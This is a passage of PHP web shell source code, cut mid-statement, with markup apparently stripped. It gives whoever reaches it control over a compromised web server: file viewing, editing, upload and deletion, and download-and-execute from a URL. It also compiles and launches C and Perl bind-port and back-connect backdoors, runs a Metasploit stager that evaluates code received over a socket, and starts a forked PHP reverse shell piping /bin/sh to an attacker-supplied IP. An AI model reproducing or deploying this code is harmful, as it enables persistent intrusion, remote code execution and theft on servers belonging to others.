Last modified".date("d-M-Y H:i",@filemtime($file))."
Last accessed".date("d-M-Y H:i",@fileatime($file))."
Actionsedit | rename | delete | download (gzip)
Viewtext | code | image
"; if(isset($_GET['type']) &&($_GET['type']=='image')){echo "
";} elseif(isset($_GET['type']) &&($_GET['type']=='code')){echo "
";$file = wordwrap(@file_get_contents($file),"240"," ");@highlight_string($file);echo "
";}else {echo "
";echo nl2br(htmlentities((@file_get_contents($file))));echo "
";}}elseif(is_dir($_GET['view'])){echo showdir($pwd,$prompt);}} elseif(isset($_GET['edit']) &&($_GET['edit'] != "")){if(isset($_POST['save'])){$file = $_POST['saveas'];$content = magicboom($_POST['content']);if($filez = @fopen($file,"w")){$time = date("d-M-Y H:i",time());if(@fwrite($filez,$content)) $msg = "file saved @ ".$time;else $msg = "failed to save";@fclose($filez);}else $msg = "permission denied";}if(!isset($file))$file = $_GET['edit'];if($filez = @fopen($file,"r")){$content = ""; while(!feof($filez)){$content .= htmlentities(str_replace("''","'",fgets($filez)));} @fclose($filez);};echo '
Save as  ';echo $msg;;echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'upload')){if(isset($_POST['uploadcomp'])){if(is_uploaded_file($_FILES['file']['tmp_name'])){$path = magicboom($_POST['path']);$fname = $_FILES['file']['name'];$tmp_name = $_FILES['file']['tmp_name'];$pindah = $path.$fname;$stat = @move_uploaded_file($tmp_name,$pindah);if ($stat) {$msg = "file uploaded to $pindah";}else $msg = "failed to upload $fname";}else $msg = "failed to upload $fname";} elseif(isset($_POST['uploadurl'])){$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$path = magicboom($_POST['path']);$namafile = download($pilihan,$wurl);$pindah = $path.$namafile;if(is_file($pindah)){$msg = "file uploaded to $pindah";}else $msg ="failed to upload $namafile";};echo '

Upload Files To The Server

Local

 

Remote
link
';echo $msg;;echo '
';} elseif(isset($_GET['x']) &&($_GET['x'] == 'back')){ if (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'C')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdc.c",$port_bind_bd_c);exe("gcc -o bdc bdc.c");exe("chmod 777 bdc");@unlink("bdc.c");exe("./bdc ".$port." ".$passwrd." &");$scan = exe("ps aux");if(eregi("./bdc $por",$scan)){$msg = "

Process successed

";}else {$msg = "

Process Failed

";}} elseif (isset($_POST['bind']) &&!empty($_POST['port']) &&!empty($_POST['bind_pass']) &&($_POST['use'] == 'Perl')) {$port = trim($_POST['port']);$passwrd = trim($_POST['bind_pass']);tulis("bdp",$port_bind_bd_pl);exe("chmod 777 bdp");$p2=which("perl");exe($p2." bdp ".$port." &");$scan = exe("ps aux");if(eregi("$p2 bdp $port",$scan)){$msg = "

Process successed

";}else {$msg = "

Process Failed

";}} elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'C')) {$ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcc.c",$back_connect_c);exe("gcc -o bcc bcc.c");exe("chmod 777 bcc");@unlink("bcc.c");exe("./bcc ".$ip." ".$port." &");$msg = "trying to connect to ".$ip." on port ".$port." ...";} elseif (isset($_POST['backconn']) &&!empty($_POST['backport']) &&!empty($_POST['ip']) &&($_POST['use'] == 'Perl')) { $ip = trim($_POST['ip']);$port = trim($_POST['backport']);tulis("bcp",$back_connect); exe("chmod +x bcp");$p2=which("perl");exe($p2." bcp ".$ip." ".$port." &"); $msg = "Trying to connect to ".$ip." on port ".$port." ...";} elseif (isset($_POST['expcompile']) &&!empty($_POST['wurl']) &&!empty($_POST['wcmd'])) {$pilihan = trim($_POST['pilihan']);$wurl = trim($_POST['wurl']);$namafile = download($pilihan,$wurl); if(is_file($namafile)){$msg = exe($wcmd);} else $msg = "error: file not found $namafile";};echo '



Bind PortBack connectdownload and Exec
Port
Password
Use
IP
Port
Use
url
cmd
';echo $msg;;echo '

'; error_reporting(0); function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));} $s_my_ip = $_SERVER['REMOTE_ADDR'];$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "

Reverse shell ( php )

Your IP
Port

Metasploit Connection

Your IP
Port
"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == ""&&$port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr,":")) {$ipaddr = "[".$ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die();}$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET,SOCK_STREAM,SOL_TCP);$res = socket_connect($msgsock,$ipaddr,$port);if (!$res) {die();}$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock,4);break;case 'socket': $len = socket_read($msgsock,4);break;}if (!$len) {die();}$a = unpack("Nlen",$len);$len = $a['len'];$buffer = '';while (strlen($buffer) <$len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock,$len-strlen($buffer));break;case 'socket': $buffer .= socket_read($msgsock,$len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip,$port,$errno,$errstr,30);if(!$sock) exit(1); $descriptorspec = array(0 =>array("pipe","r"),1 =>array("pipe","w"),2 =>array("pipe","w")); $process = proc_open($shell,$descriptorspec,$pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0],0); stream_set_blocking($pipes[1],0); stream_set_blocking($pipes[2],0); stream_set_blocking($sock,0); while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock,$pipes[1],$pipes[2]);$num_changed_sockets = stream_select($read_a,$write_a,$error_a,null); if(in_array($sock,$read_a)){$input = fread($sock,$chunk_size);fwrite($pipes[0],$input);} if(in_array($pipes[1],$read_a)){$input = fread($pipes[1],$chunk_size);fwrite($sock,$input);} if(in_array($pipes[2],$read_a)){$input = fread($pipes[2],$chunk_size);fwrite($sock,$input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;}}elseif(isset($_GET['x']) &&($_GET['x'] == 'shell')){;echo '
';echo $prompt;;echo '
';}else{if(isset($_GET['delete']) &&($_GET['delete'] != "")){$file = $_GET['delete'];@unlink($file);} elseif(isset($_GET['fdelete']) &&($_GET['fdelete'] != "")){@rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));} elseif(isset($_GET['mkdir']) &&($_GET['mkdir'] != "")){$path = $pwd.$_GET['mkdir'];@mkdir($path);}$buff = showdir($pwd,$prompt);echo $buff;} ;echo '
';;